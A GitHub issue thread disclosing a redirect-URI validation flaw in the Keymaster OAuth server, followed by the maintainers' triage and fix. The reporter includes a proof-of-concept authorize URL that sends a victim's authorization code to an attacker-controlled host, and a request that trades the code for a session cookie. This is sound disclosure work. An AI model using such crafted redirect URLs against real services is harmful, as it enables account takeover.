### ISSUE TITLE
Security Vulnerability - Insecure Input Validation

### ISSUE THREAD

**Issue by benmap-brex** [Cloud-Foundations/keymaster#25]
### Severity: 
High Risk

### Summary: 
Insecure input validation occurs when an application does not perform input validation before using untrusted input in a downstream component.

### Details: 
The keymaster application validates redirect URLs using a regular expression that does not take into account URL metacharacters such as `?` and `@`. By using a `?` character in a redirect URL, an attacker can force a victim to send their authentication credentials to an attacker controlled site. For example, this redirect_uri will send a user's credentials to `rooted.systems` instead of the intended target `example.com`

```
/idp/oauth2/authorize?client_id=Vpih48hsRwUv5oqpYYNg7f8u34RI1N2D%2F%2FknlziteYo%3D&redirect_uri=https%3a//rooted.systems%3f.example.com/
```

Upon authenticating with a malicious URL, the victim's credentials are sent to the attacker controlled site:

```
/?.example.com/?code=eyJhbGciOiJSUzI1NiIsImtpZCI6IiIsInR5cCI6IkpXVCJ9.[REDACTED].pBlnR6pIJxKFDiqoxz4FVmvchEDP4ubZKRQ3wk28Uu0 HTTP/1.1
Host: rooted.systems
...omitted for brevity...
```

As shown above, after authenticating with the malicious URL, the victm's authentication code is sent to `rooted.systems` as part of a URL parameter.

**Comment by cviecco** [comment]
This is indeed an error.. we should stop using regexes and using full urls to do this. In the mean time we can harden the regexp used to do the filtering url. Also notice that the credentials are NOT sent back to the attacker, but the code... and an attacker still needs the client id and password to transform this code into user information.

**Comment by benmap-brex** [comment]
What I meant was the code is exchangeable for an authentication cookie resulting in ATO at `/oauth2/redirectendpoint?code=` endpoint, granting access to keymaster:

```
GET /oauth2/redirectendpoint?code=eyJhbGciOiJSUzI1NiIsImtpZCI6IiIsInR5cCI6IkpXVCJ9.[REDACTED] HTTP/1.1
Host: [REDACTED]
```

...

```
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /getconsole?accountName=[REDACTED]&amp;roleName=[REDACTED]
Set-Cookie: auth_cookie_UVmtL4=[REDACTED]; 
...

<a href="/getconsole?accountName=[REDACTED]&amp;roleName=[REDACTED]">Found</a>.
```

Sorry if that bit was confusing, credential is a bit vague.

**Comment by cviecco** [comment]
After looking a bit into it, it actually seems to a configuration issue. However we make this configuration mistake reaaaaly easy to do. The only actionable action (short term) is to enhance documentation so that a sample of a secure regular expression is shown. For long term we need to stop using regexps and use full url parsing.

**Comment by cviecco** [comment]
@benmap-brex :  This is scored similarly as https://github.com/Cloud-Foundations/keymaster/issues/22 , (but higher) as it requires user input. I think this one is a higher priority than 22. Do you agree?

**Comment by benmap-brex** [comment]
I agree this is the highest priority as it allows account takeover.

**Comment by cviecco** [comment]
I wrote https://github.com/Cloud-Foundations/keymaster/pull/26  to adress this. 
In short:
1. Adds optional explicit list of domains to check
2. Warns admin if domains have NOT been explicitly set
3. Adds minimal testing against some example domains.

You are welcome to take a look a the PR and make suggestions

**Comment by cviecco** [comment]
with https://github.com/Cloud-Foundations/keymaster/pull/26 merged this issue is considered closed. @benmap-brex feel free to reopen if you think this is not right.
